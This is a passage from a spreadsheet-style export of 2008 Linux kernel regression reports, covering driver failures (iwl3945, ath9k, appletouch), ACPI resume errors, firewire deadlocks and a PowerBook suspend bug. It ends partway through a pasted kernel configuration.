    <t>Latest working kernel version: 2.6.26.3 (at least in my tests) Earliest failing kernel version: Distribution: Gentoo Hardware Environment: x86 (32 bits) Problem Description: I got a segfault when I trie to mount an XFS partition. If I tried once more my machine freeze. Steps to reproduce: ~# modprobe xfs ~# mount -t xfs /dev/sda3 /mnt/folder Segmentation Fault</t>
  </si>
  <si>
    <t>iwl3945 fails with microcode error</t>
  </si>
  <si>
    <t>2.6.28 git</t>
  </si>
  <si>
    <t>2008-10-22 02:36 UTC</t>
  </si>
  <si>
    <t>2008-11-11 12:36 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: v2.6.27-3158-g01f9a21 / v2.6.27-3169-gf93b673 Distribution: n/a Hardware Environment: iwl 3945 wireless Software Environment: Problem Description: 3945 driver fails with microcode error Steps to reproduce: load iwl3945, see it fail See http://thread.gmane.org/gmane.linux.kernel.wireless.general/22395 for more information. I personally don't have this hardware, but the bug should be tracked. A workaround is available, it is right now to install newer firmware. Commits 01f9a21af3644224ecc899adeea31dc00418ddae and f93b673fcfe2670ccb22434d2ec7660b9f1c3fb8 have been identified by Intel as causing the regression.</t>
  </si>
  <si>
    <t>ACPI errors just after resuming from s2disk</t>
  </si>
  <si>
    <t>2008-10-23 00:13 UTC</t>
  </si>
  <si>
    <t>2008-11-12 21:33 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 (not sure) Earliest failing kernel version: 2.6.27 Distribution: Debian Unstable Hardware Environment: MSI M673 laptop (AMD Turion + NVIDIA chipset) Followed errors messages floods dmesg sometimes just after resuming from hibernate (approx. every second): [42016.520062] ACPI: EC: acpi_ec_wait timeout, status = 0x1a, event = "b1=0" [42016.520079] ACPI: EC: input buffer is not empty, aborting transaction [42017.025050] ACPI: EC: acpi_ec_wait timeout, status = 0x1a, event = "b1=0" [42017.025197] ACPI: EC: input buffer is not empty, aborting transaction [42017.025254] ACPI Exception (evregion-0419): AE_TIME, Returned by Handler for [EmbeddedControl] [20080609] [42017.025350] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC__.BAT1.UPBS] (Node f78353b0), AE_TIME [42017.025546] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._BST] (Node f7835400), AE_TIME [42017.025715] ACPI Exception (battery-0360): AE_TIME, Evaluating _BST [20080609] Battery state is not updating after this. So if it was charged to "90%" it will be displayed 90% forever.. Charger plugged/unplugged status is not updated too. (However display backlight is automatically adjusted after plugging it. Looks like this is hardware feature or is done by BIOS) Rebooting/turing off/on causes system freeze before displaying BIOS splash. So I got just blank screen (with turned off backlight in case of turning off). I can turn laptop off again by pressing power button for ~3 seconds, however after turning it on it will not boot. The only way to make it working again is removing battery with unplugged charger for 4-5 seconds. I can't test v2.6.26 kernel, since it was unbootable here at all for some other reason that was fixed in 2.6.27-rc7. I think that there was no such problem with 2.6.25 however I'm not 100% sure. Issue is very difficult to reproduce (this is just second case for ~2-3 weeks). So I think, that bisecting is impossible (or will take years). I don't use msi-laptop module (however I can load it with force=1 and it will work). Alexey Starikovskiy at lkml suggested to replace msleep(1) with udelay(50) in drivers/acpi/ec.c. I've dont this and tried ~15 hibernate/resume cycles.. There were no errors. Since it's very difficult to reproduce issue I will wait some time with this patched kernel. (CC'ing here) s2disk is done via TOI patch (applied on top of 2.6.27.2).</t>
  </si>
  <si>
    <t>ath9k / DMA: Out of SW-IOMMU space for 4224 bytes at device 0000:0b:00.0</t>
  </si>
  <si>
    <t>2008-10-23 00:45 UTC</t>
  </si>
  <si>
    <t>Matthias Goldhoorn</t>
  </si>
  <si>
    <t>2008-12-11 15:11 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.27 Distribution: Gentoo Hardware Environment: MacBook Pro Core2Duo 2Ghz Software Environment: Problem Description: Massive DMA Problems with ath9k driver Steps to reproduce: Boot kernek, load atheros Driver, download anything. After around 30-120sekounds Kernel Hangs for Wlan and DISK Access. Massive kernel outputs: Oct 14 15:35:03 localhost DMA: Out of SW-IOMMU space for 4224 bytes at device 0000:0b:00.0 after a while Oct 14 15:35:04 localhost ata1.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x0 Oct 14 15:35:04 localhost ata1.00: cmd 35/00:00:b8:17:51/00:04:17:00:00/e0 tag 0 dma 524288 out Oct 14 15:35:04 localhost res 50/00:00:77:76:1c/00:00:16:00:00/e0 Emask 0x40 (internal error) Oct 14 15:35:04 localhost ata1.00: status: { DRDY } Oct 14 15:35:04 localhost DMA: Out of SW-IOMMU space for 4224 bytes at device 0000:0b:00.0 Oct 14 15:35:04 localhost ata1.00: configured for UDMA/133 Oct 14 15:35:04 localhost ata1: EH complete So only an hard Reboot solves Problem. This Problem occours only on load the Atheros driver. HD Driver only works without Problem. Found similar Problem at: http://kerneltrap.org/mailarchive/linux-kernel/2008/8/4/2815804 Attached /var/log/messages...</t>
  </si>
  <si>
    <t>webcam</t>
  </si>
  <si>
    <t>Laurent Pinchart</t>
  </si>
  <si>
    <t>2.6.28-rc1</t>
  </si>
  <si>
    <t>Jens Weibler</t>
  </si>
  <si>
    <t>Wirless Card don't work (iwl3945)</t>
  </si>
  <si>
    <t>2.6.27.3</t>
  </si>
  <si>
    <t>2008-10-24 06:13 UTC</t>
  </si>
  <si>
    <t>Thomas Bechtold</t>
  </si>
  <si>
    <t>2009-03-02 10:06 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: don't know Distribution: Ubuntu 8.10 (Kernel is self compiled from ftp.kernel.org) Hardware Environment: Dell XPS 1530M (Laptop) Software Environment: Problem Description: Sometimes i can use the wlan-card, sometimes not. It's randomly. I just have to reboot and then it works or not. Steps to reproduce: Start the Computer. Sometimes wlan works, sometimes not. I tried the Kernel from ftp.kernel.org and also the official kernel from ubuntu 8.04 and 8.10. When the driver does not work i see the following error-messages: $dmesg |grep iwl [ 17.337238] iwl3945: Intel(R) PRO/Wireless 3945ABG/BG Network Connection driver for Linux, 1.2.26kds [ 17.337243] iwl3945: Copyright(c) 2003-2008 Intel Corporation [ 17.337250] bus: 'pci': add driver iwl3945 [ 17.337272] bus: 'pci': driver_probe_device: matched device 0000:0b:00.0 with driver iwl3945 [ 17.337274] bus: 'pci': really_probe: probing driver iwl3945 with device 0000:0b:00.0 [ 17.337320] iwl3945 0000:0b:00.0: enabling device (0000 -&gt; 0002) [ 17.337331] iwl3945 0000:0b:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 17.337350] iwl3945 0000:0b:00.0: setting latency timer to 64 [ 17.337373] iwl3945: Detected Intel Wireless WiFi Link 3945ABG [ 17.357797] iwl3945: Error: saturation power is -1, less than minimum expected 40 [ 17.357800] iwl3945: Invalid power index [ 17.357803] iwl3945: initializing regulatory failed: -5 [ 17.357895] iwl3945 0000:0b:00.0: PCI INT A disabled [ 17.357907] iwl3945: probe of 0000:0b:00.0 failed with error -5 ( ^^ /var/log/syslog has the same message) $lsmod |grep iwl iwl3945 173172 0 rfkill 17304 1 iwl3945 mac80211 214004 1 iwl3945 led_class 12292 1 iwl3945 cfg80211 32520 2 iwl3945,mac80211 What more information do you need? Best regards, Tom</t>
  </si>
  <si>
    <t>2.6.27: 0 MHz CPU and wrong system time on AMD Geode system</t>
  </si>
  <si>
    <t>2008-10-24 15:43 UTC</t>
  </si>
  <si>
    <t>2008-11-16 11:06 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27: 0 MHz CPU and wrong system time on AMD Geode system Submitter : Antipov Dmitry &lt;dmantipov@yandex.ru&gt; Date : 2008-10-15 6:39 References : http://marc.info/?l=linux-kernel&amp;m=122405421010969&amp;w=4 Handled-By : Jordan Crouse &lt;jordan.crouse@amd.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>dv1394: possible deadlock if accessed by multithreaded app</t>
  </si>
  <si>
    <t>2008-10-25 01:56 UTC</t>
  </si>
  <si>
    <t>2008-11-07 09:28 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: unknown Reported by Johannes Weiner in http://lkml.org/lkml/2008/10/23/192: - dv1394_write() locks video-&gt;mtx, then calls copy_from_user() which may lock mmap_sem if a page fault occurs. - dv1394_mmap() is called with mmap_sem held, then locks video-&gt;mtx.</t>
  </si>
  <si>
    <t>raw1394: possible deadlock if accessed by multithreaded app</t>
  </si>
  <si>
    <t>2008-10-25 02:08 UTC</t>
  </si>
  <si>
    <t>2008-11-07 09:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc1 Reported by Johannes Weiner in http://lkml.org/lkml/2008/10/23/192: - raw1394_ioctl() locks fi-&gt;state_mutex, then calls copy_from/to_user() which may lock mmap_sem due to page fault. - raw1394_mmap() is called with mmap_sem held, then locks fi-&gt;state_mutex. fi-&gt;state_mutex was introduced while Big Kernel Lock usage was removed from raw1394 by http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=10963ea1bd966ba46a46178c4d6abcdf3c23538d There are two related follow-up changes to raw1394: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=ddfb908d3f905dbb5964d6fbf783e69c417eb13e http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=f22e52b89e036fd12b9374212da8b5d4a447bd1e This bug is unlikely to hit because all raw1394 users (i.e. libraw1394 users) have been trained to use a file handle only in a single thread. Before above mentioned commits, raw1394 would have corrupted its internal state anyway if accessed by multiple threads. Nevertheless, it's a regression which I need to fix ASAP.</t>
  </si>
  <si>
    <t>appletouch broken</t>
  </si>
  <si>
    <t>2008-10-25 03:55 UTC</t>
  </si>
  <si>
    <t>2008-10-27 13:14 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc1, no bisection yet Distribution: debian/unstable Hardware Environment: powerbook5,6 Software Environment: ? Appletouch fails to bind the device, loading it merely yields: usbcore: registered new interface driver appletouch</t>
  </si>
  <si>
    <t>extreme slowness of IO stuff using 2.6.28-rc1</t>
  </si>
  <si>
    <t>2008-10-25 04:25 UTC</t>
  </si>
  <si>
    <t>2008-11-10 04:32 UTC</t>
  </si>
  <si>
    <t>11893 11987</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc1 Distribution: Debian Hardware Environment: T61 Software Environment: Luks-encrypted device-mapper Problem Description: I have a problem with ata stuff in 2.6.28-rc1. I first encountered the “bug with non-ncq devices master” so I patched using e013e13bf605b9e6b702adffbe2853cfc60e7806 But then, the boot is really really slow. It seems to hangs, as if it waited for the disk. I guess you could wait for ages before something happen. But when pressing a key (I tried with right alt, but I guess any key would work), the boot process continues, as if some interrupts was generated, or something like that. I'll attach my .config in case. Steps to reproduce:</t>
  </si>
  <si>
    <t>suspend broken on powerbook5,6</t>
  </si>
  <si>
    <t>2008-10-25 05:07 UTC</t>
  </si>
  <si>
    <t>2008-10-31 13:59 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: -rc1 Distribution: debian/unstable (unchanged, just kernel upgrade manually) Hardware Environment: powerbook5,6 My powerbook fails to suspend, it switches to the suspend console, seems to turn off the display (not entirely sure at this point) and just hangs there. Config below. # # Automatically generated make config: don't edit # Linux kernel version: 2.6.28-rc1 # Sat Oct 25 01:33:45 2008 # # CONFIG_PPC64 is not set # # Processor support # CONFIG_6xx=y # CONFIG_PPC_85xx is not set # CONFIG_PPC_8xx is not set # CONFIG_40x is not set # CONFIG_44x is not set # CONFIG_E200 is not set CONFIG_PPC_FPU=y CONFIG_ALTIVEC=y CONFIG_PPC_STD_MMU=y CONFIG_PPC_STD_MMU_32=y # CONFIG_PPC_MM_SLICES is not set # CONFIG_SMP is not set CONFIG_PPC32=y CONFIG_WORD_SIZE=32 # CONFIG_ARCH_PHYS_ADDR_T_64BIT is not set CONFIG_MMU=y CONFIG_GENERIC_CMOS_UPDATE=y CONFIG_GENERIC_TIME=y CONFIG_GENERIC_TIME_VSYSCALL=y CONFIG_GENERIC_CLOCKEVENTS=y CONFIG_GENERIC_HARDIRQS=y # CONFIG_HAVE_SETUP_PER_CPU_AREA is not set CONFIG_IRQ_PER_CPU=y CONFIG_STACKTRACE_SUPPORT=y CONFIG_HAVE_LATENCYTOP_SUPPORT=y CONFIG_LOCKDEP_SUPPORT=y CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_ARCH_HAS_ILOG2_U32=y CONFIG_GENERIC_HWEIGHT=y CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_GENERIC_FIND_NEXT_BIT=y # CONFIG_ARCH_NO_VIRT_TO_BUS is not set CONFIG_PPC=y CONFIG_EARLY_PRINTK=y CONFIG_GENERIC_NVRAM=y CONFIG_SCHED_NO_NO_OMIT_FRAME_POINTER=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y CONFIG_PPC_OF=y CONFIG_OF=y # CONFIG_PPC_UDBG_16550 is not set # CONFIG_GENERIC_TBSYNC is not set CONFIG_AUDIT_ARCH=y CONFIG_GENERIC_BUG=y CONFIG_SYS_SUPPORTS_APM_EMULATION=y # CONFIG_DEFAULT_UIMAGE is not set CONFIG_HIBERNATE_32=y CONFIG_ARCH_HIBERNATION_POSSIBLE=y CONFIG_ARCH_SUSPEND_POSSIBLE=y # CONFIG_PPC_DCR_NATIVE is not set # CONFIG_PPC_DCR_MMIO is not set CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config" # # General setup # CONFIG_EXPERIMENTAL=y CONFIG_BROKEN_ON_SMP=y CONFIG_LOCK_KERNEL=y CONFIG_INIT_ENV_ARG_LIMIT=32 CONFIG_LOCALVERSION="" CONFIG_LOCALVERSION_AUTO=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSVIPC_SYSCTL=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y # CONFIG_BSD_PROCESS_ACCT_V3 is not set CONFIG_TASKSTATS=y CONFIG_TASK_DELAY_ACCT=y CONFIG_TASK_XACCT=y CONFIG_TASK_IO_ACCOUNTING=y CONFIG_AUDIT=y # CONFIG_AUDITSYSCALL is not set CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y CONFIG_LOG_BUF_SHIFT=21 # CONFIG_CGROUPS is not set # CONFIG_GROUP_SCHED is not set # CONFIG_SYSFS_DEPRECATED_V2 is not set CONFIG_RELAY=y CONFIG_NAMESPACES=y # CONFIG_UTS_NS is not set # CONFIG_IPC_NS is not set # CONFIG_USER_NS is not set # CONFIG_PID_NS is not set CONFIG_BLK_DEV_INITRD=y CONFIG_INITRAMFS_SOURCE="/home/johannes/Projects/cryptsuspend/filelist" CONFIG_INITRAMFS_ROOT_UID=0 CONFIG_INITRAMFS_ROOT_GID=0 # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set CONFIG_SYSCTL=y # CONFIG_EMBEDDED is not set CONFIG_SYSCTL_SYSCALL=y CONFIG_KALLSYMS=y CONFIG_KALLSYMS_ALL=y # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_HOTPLUG=y CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_ELF_CORE=y # CONFIG_COMPAT_BRK is not set CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_ANON_INODES=y CONFIG_EPOLL=y CONFIG_SIGNALFD=y CONFIG_TIMERFD=y CONFIG_EVENTFD=y CONFIG_SHMEM=y CONFIG_AIO=y CONFIG_VM_EVENT_COUNTERS=y CONFIG_PCI_QUIRKS=y CONFIG_SLUB_DEBUG=y # CONFIG_SLAB is not set CONFIG_SLUB=y # CONFIG_SLOB is not set CONFIG_PROFILING=y CONFIG_TRACEPOINTS=y # CONFIG_MARKERS is not set CONFIG_OPROFILE=m CONFIG_HAVE_OPROFILE=y CONFIG_KPROBES=y CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS=y CONFIG_KRETPROBES=y CONFIG_HAVE_IOREMAP_PROT=y CONFIG_HAVE_KPROBES=y CONFIG_HAVE_KRETPROBES=y CONFIG_HAVE_ARCH_TRACEHOOK=y # CONFIG_HAVE_GENERIC_DMA_COHERENT is not set CONFIG_SLABINFO=y CONFIG_RT_MUTEXES=y # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 CONFIG_MODULES=y CONFIG_MODULE_FORCE_LOAD=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_MODVERSIONS=y # CONFIG_MODULE_SRCVERSION_ALL is not set CONFIG_KMOD=y CONFIG_BLOCK=y # CONFIG_LBD is not set CONFIG_BLK_DEV_IO_TRACE=y # CONFIG_LSF is not set CONFIG_BLK_DEV_BSG=y # CONFIG_BLK_DEV_INTEGRITY is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_DEFAULT_AS is not set # CONFIG_DEFAULT_DEADLINE is not set CONFIG_DEFAULT_CFQ=y # CONFIG_DEFAULT_NOOP is not set CONFIG_DEFAULT_IOSCHED="cfq" CONFIG_CLASSIC_RCU=y CONFIG_FREEZER=y # # Platform support # CONFIG_PPC_MULTIPLATFORM=y CONFIG_CLASSIC32=y # CONFIG_PPC_CHRP is not set # CONFIG_MPC5121_ADS is not set # CONFIG_MPC5121_GENERIC is not set # CONFIG_PPC_MPC52xx is not set CONFIG_PPC_PMAC=y # CONFIG_PPC_CELL is not set # CONFIG_PPC_CELL_NATIVE is not set # CONFIG_PPC_82xx is not set # CONFIG_PQ2ADS is not set # CONFIG_PPC_83xx is not set # CONFIG_PPC_86xx is not set # CONFIG_EMBEDDED6xx is not set CONFIG_PPC_NATIVE=y # CONFIG_IPIC is not set CONFIG_MPIC=y # CONFIG_MPIC_WEIRD is not set # CONFIG_PPC_I8259 is not set # CONFIG_PPC_RTAS is not set # CONFIG_MMIO_NVRAM is not set CONFIG_PPC_MPC106=y # CONFIG_PPC_970_NAP is not set # CONFIG_PPC_INDIRECT_IO is not set # CONFIG_GENERIC_IOMAP is not set CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_TABLE=y # CONFIG_CPU_FREQ_DEBUG is not set CONFIG_CPU_FREQ_STAT=y CONFIG_CPU_FREQ_STAT_DETAILS=y # CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE is not set # CONFIG_CPU_FREQ_DEFAULT_GOV_POWERSAVE is not set CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE=y # CONFIG_CPU_FREQ_DEFAULT_GOV_ONDEMAND is not set # CONFIG_CPU_FREQ_DEFAULT_GOV_CONSERVATIVE is not set # CONFIG_CPU_FREQ_GOV_PERFORMANCE is not set CONFIG_CPU_FREQ_GOV_POWERSAVE=m CONFIG_CPU_FREQ_GOV_USERSPACE=y CONFIG_CPU_FREQ_GOV_ONDEMAND=m # CONFIG_CPU_FREQ_GOV_CONSERVATIVE is not set # # CPU Frequency drivers # CONFIG_CPU_FREQ_PMAC=y # CONFIG_PPC601_SYNC_FIX is not set # CONFIG_TAU is not set # CONFIG_FSL_ULI1575 is not set # # Kernel options # CONFIG_HIGHMEM=y CONFIG_TICK_ONESHOT=y CONFIG_NO_HZ=y CONFIG_HIGH_RES_TIMERS=y CONFIG_GENERIC_CLOCKEVENTS_BUILD=y CONFIG_HZ_100=y # CONFIG_HZ_250 is not set # CONFIG_HZ_300 is not set # CONFIG_HZ_1000 is not set CONFIG_HZ=100 CONFIG_SCHED_HRTICK=y # CONFIG_PREEMPT_NONE is not set # CONFIG_PREEMPT_VOLUNTARY is not set CONFIG_PREEMPT=y # CONFIG_PREEMPT_RCU is not set CONFIG_BINFMT_ELF=y CONFIG_CORE_DUMP_DEFAULT_ELF_HEADERS=y # CONFIG_HAVE_AOUT is not set CONFIG_BINFMT_MISC=m # CONFIG_IOMMU_HELPER is not set CONFIG_ARCH_ENABLE_MEMORY_HOTPLUG=y CONFIG_ARCH_HAS_WALK_MEMORY=y CONFIG_ARCH_ENABLE_MEMORY_HOTREMOVE=y # CONFIG_KEXEC is not set CONFIG_ARCH_FLATMEM_ENABLE=y CONFIG_ARCH_POPULATES_NODE_MAP=y CONFIG_SELECT_MEMORY_MODEL=y CONFIG_FLATMEM_MANUAL=y # CONFIG_DISCONTIGMEM_MANUAL is not set # CONFIG_SPARSEMEM_MANUAL is not set CONFIG_FLATMEM=y CONFIG_FLAT_NODE_MEM_MAP=y CONFIG_PAGEFLAGS_EXTENDED=y CONFIG_SPLIT_PTLOCK_CPUS=4 # CONFIG_MIGRATION is not set # CONFIG_RESOURCES_64BIT is not set # CONFIG_PHYS_ADDR_T_64BIT is not set CONFIG_ZONE_DMA_FLAG=1 CONFIG_BOUNCE=y CONFIG_VIRT_TO_BUS=y CONFIG_UNEVICTABLE_LRU=y CONFIG_FORCE_MAX_ZONEORDER=11 CONFIG_PROC_DEVICETREE=y # CONFIG_CMDLINE_BOOL is not set CONFIG_EXTRA_TARGETS="" CONFIG_ARCH_WANTS_FREEZER_CONTROL=y CONFIG_PM=y CONFIG_PM_DEBUG=y CONFIG_PM_VERBOSE=y CONFIG_CAN_PM_TRACE=y CONFIG_PM_SLEEP=y CONFIG_SUSPEND=y CONFIG_SUSPEND_FREEZER=y CONFIG_HIBERNATION=y CONFIG_PM_STD_PARTITION="" CONFIG_APM_EMULATION=m CONFIG_SECCOMP=y CONFIG_ISA_DMA_API=y # # Bus options # CONFIG_ZONE_DMA=y CONFIG_GENERIC_ISA_DMA=y CONFIG_PPC_INDIRECT_PCI=y CONFIG_PCI=y CONFIG_PCI_DOMAINS=y CONFIG_PCI_SYSCALL=y # CONFIG_PCIEPORTBUS is not set CONFIG_ARCH_SUPPORTS_MSI=y # CONFIG_PCI_MSI is not set # CONFIG_PCI_LEGACY is not set # CONFIG_PCI_DEBUG is not set CONFIG_PCCARD=m # CONFIG_PCMCIA_DEBUG is not set CONFIG_PCMCIA=m CONFIG_PCMCIA_LOAD_CIS=y # CONFIG_PCMCIA_IOCTL is not set CONFIG_CARDBUS=y # # PC-card bridges # CONFIG_YENTA=m CONFIG_YENTA_O2=y CONFIG_YENTA_RICOH=y CONFIG_YENTA_TI=y CONFIG_YENTA_ENE_TUNE=y CONFIG_YENTA_TOSHIBA=y # CONFIG_PD6729 is not set # CONFIG_I82092 is not set CONFIG_PCCARD_NONSTATIC=m # CONFIG_HOTPLUG_PCI is not set # CONFIG_HAS_RAPIDIO is not set # # Advanced setup # # CONFIG_ADVANCED_OPTIONS is not set # # Default settings for advanced configuration options are used # CONFIG_LOWMEM_SIZE=0x30000000 CONFIG_PAGE_OFFSET=0xc0000000 CONFIG_KERNEL_START=0xc0000000 CONFIG_PHYSICAL_START=0x00000000 CONFIG_TASK_SIZE=0xc0000000 CONFIG_NET=y # # Networking options # CONFIG_NET_HOLD_DBG=y CONFIG_PACKET=m CONFIG_PACKET_MMAP=y CONFIG_UNIX=m CONFIG_XFRM=y CONFIG_XFRM_USER=m # CONFIG_XFRM_SUB_POLICY is not set # CONFIG_XFRM_MIGRATE is not set # CONFIG_XFRM_STATISTICS is not set CONFIG_XFRM_IPCOMP=m CONFIG_NET_KEY=m # CONFIG_NET_KEY_MIGRATE is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IP_ADVANCED_ROUTER=y CONFIG_ASK_IP_FIB_HASH=y # CONFIG_IP_FIB_TRIE is not set CONFIG_IP_FIB_HASH=y CONFIG_IP_MULTIPLE_TABLES=y CONFIG_IP_ROUTE_MULTIPATH=y CONFIG_IP_ROUTE_VERBOSE=y # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=m CONFIG_NET_IPGRE=m CONFIG_NET_IPGRE_BROADCAST=y CONFIG_IP_MROUTE=y CONFIG_IP_PIMSM_V1=y CONFIG_IP_PIMSM_V2=y CONFIG_ARPD=y CONFIG_SYN_COOKIES=y CONFIG_INET_AH=m CONFIG_INET_ESP=m CONFIG_INET_IPCOMP=m CONFIG_INET_XFRM_TUNNEL=m CONFIG_INET_TUNNEL=y CONFIG_INET_XFRM_MODE_TRANSPORT=m CONFIG_INET_XFRM_MODE_TUNNEL=m CONFIG_INET_XFRM_MODE_BEET=y CONFIG_INET_LRO=y CONFIG_INET_DIAG=y CONFIG_INET_TCP_DIAG=y # CONFIG_TCP_CONG_ADVANCED is not set CONFIG_TCP_CONG_CUBIC=y CONFIG_DEFAULT_TCP_CONG="cubic" # CONFIG_TCP_MD5SIG is not set CONFIG_IPV6=y CONFIG_IPV6_PRIVACY=y # CONFIG_IPV6_ROUTER_PREF is not set # CONFIG_IPV6_OPTIMISTIC_DAD is not set CONFIG_INET6_AH=m CONFIG_INET6_ESP=m CONFIG_INET6_IPCOMP=m # CONFIG_IPV6_MIP6 is not set CONFIG_INET6_XFRM_TUNNEL=m CONFIG_INET6_TUNNEL=m CONFIG_INET6_XFRM_MODE_TRANSPORT=y CONFIG_INET6_XFRM_MODE_TUNNEL=m CONFIG_INET6_XFRM_MODE_BEET=y # CONFIG_INET6_XFRM_MODE_ROUTEOPTIMIZATION is not set CONFIG_IPV6_SIT=y CONFIG_IPV6_NDISC_NODETYPE=y CONFIG_IPV6_TUNNEL=m # CONFIG_IPV6_MULTIPLE_TABLES is not set # CONFIG_IPV6_MROUTE is not set # CONFIG_NETWORK_SECMARK is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_NETFILTER_ADVANCED=y CONFIG_BRIDGE_NETFILTER=y # # Core Netfilter Configuration # CONFIG_NETFILTER_NETLINK=m CONFIG_NETFILTER_NETLINK_QUEUE=m CONFIG_NETFILTER_NETLINK_LOG=m CONFIG_NF_CONNTRACK=m # CONFIG_NF_CT_ACCT is not set # CONFIG_NF_CONNTRACK_MARK is not set # CONFIG_NF_CONNTRACK_EVENTS is not set # CONFIG_NF_CT_PROTO_DCCP is not set # CONFIG_NF_CT_PROTO_SCTP is not set # CONFIG_NF_CT_PROTO_UDPLITE is not set # CONFIG_NF_CONNTRACK_AMANDA is not set # CONFIG_NF_CONNTRACK_FTP is not set # CONFIG_NF_CONNTRACK_H323 is not set # CONFIG_NF_CONNTRACK_IRC is not set # CONFIG_NF_CONNTRACK_NETBIOS_NS is not set # CONFIG_NF_CONNTRACK_PPTP is not set # CONFIG_NF_CONNTRACK_SANE is not set CONFIG_NF_CONNTRACK_SIP=m # CONFIG_NF_CONNTRACK_TFTP is not set CONFIG_NF_CT_NETLINK=m CONFIG_NETFILTER_XTABLES=m # CONFIG_NETFILTER_XT_TARGET_CLASSIFY is not set # CONFIG_NETFILTER_XT_TARGET_CONNMARK is not set # CONFIG_NETFILTER_XT_TARGET_MARK is not set # CONFIG_NETFILTER_XT_TARGET_NFLOG is not set # CONFIG_NETFILTER_XT_TARGET_NFQUEUE is not set # CONFIG_NETFILTER_XT_TARGET_RATEEST is not set # CONFIG_NETFILTER_XT_TARGET_TCPMSS is not set # CONFIG_NETFILTER_XT_MATCH_COMMENT is not set # CONFIG_NETFILTER_XT_MATCH_CONNBYTES is not set # CONFIG_NETFILTER_XT_MATCH_CONNLIMIT is not set # CONFIG_NETFILTER_XT_MATCH_CONNMARK is not set # CONFIG_NETFILTER_XT_MATCH_CONNTRACK is not set # CONFIG_NETFILTER_XT_MATCH_DCCP is not set # CONFIG_NETFILTER_XT_MATCH_DSCP is not set # CONFIG_NETFILTER_XT_MATCH_ESP is not set # CONFIG_NETFILTER_XT_MATCH_HASHLIMIT is not set # CONFIG_NETFILTER_XT_MATCH_HELPER is not set # CONFIG_NETFILTER_XT_MATCH_IPRANGE is not set # CONFIG_NETFILTER_XT_MATCH_LENGTH is not set # CONFIG_NETFILTER_XT_MATCH_LIMIT is not set # CONFIG_NETFILTER_XT_MATCH_MAC is not set # CONFIG_NETFILTER_XT_MATCH_MARK is not set # CONFIG_NETFILTER_XT_MATCH_MULTIPORT is not set # CONFIG_NETFILTER_XT_MATCH_OWNER is not set # CONFIG_NETFILTER_XT_MATCH_POLICY is not set # CONFIG_NETFILTER_XT_MATCH_PHYSDEV is not set # CONFIG_NETFILTER_XT_MATCH_PKTTYPE is not set # CONFIG_NETFILTER_XT_MATCH_QUOTA is not set # CONFIG_NETFILTER_XT_MATCH_RATEEST is not set # CONFIG_NETFILTER_XT_MATCH_REALM is not set # CONFIG_NETFILTER_XT_MATCH_RECENT is not set # CONFIG_NETFILTER_XT_MATCH_SCTP is not set # CONFIG_NETFILTER_XT_MATCH_STATE is not set # CONFIG_NETFILTER_XT_MATCH_STATISTIC is not set # CONFIG_NETFILTER_XT_MATCH_STRING is not set # CONFIG_NETFILTER_XT_MATCH_TCPMSS is not set # CONFIG_NETFILTER_XT_MATCH_TIME is not set # CONFIG_NETFILTER_XT_MATCH_U32 is not set CONFIG_IP_VS=m # CONFIG_IP_VS_IPV6 is not set # CONFIG_IP_VS_DEBUG is not set CONFIG_IP_VS_TAB_BITS=12 # # IPVS transport protocol load balancing support # CONFIG_IP_VS_PROTO_TCP=y CONFIG_IP_VS_PROTO_UDP=y CONFIG_IP_VS_PROTO_AH_ESP=y CONFIG_IP_VS_PROTO_ESP=y CONFIG_IP_VS_PROTO_AH=y # # IPVS scheduler # CONFIG_IP_VS_RR=m CONFIG_IP_VS_WRR=m CONFIG_IP_VS_LC=m CONFIG_IP_VS_WLC=m CONFIG_IP_VS_LBLC=m 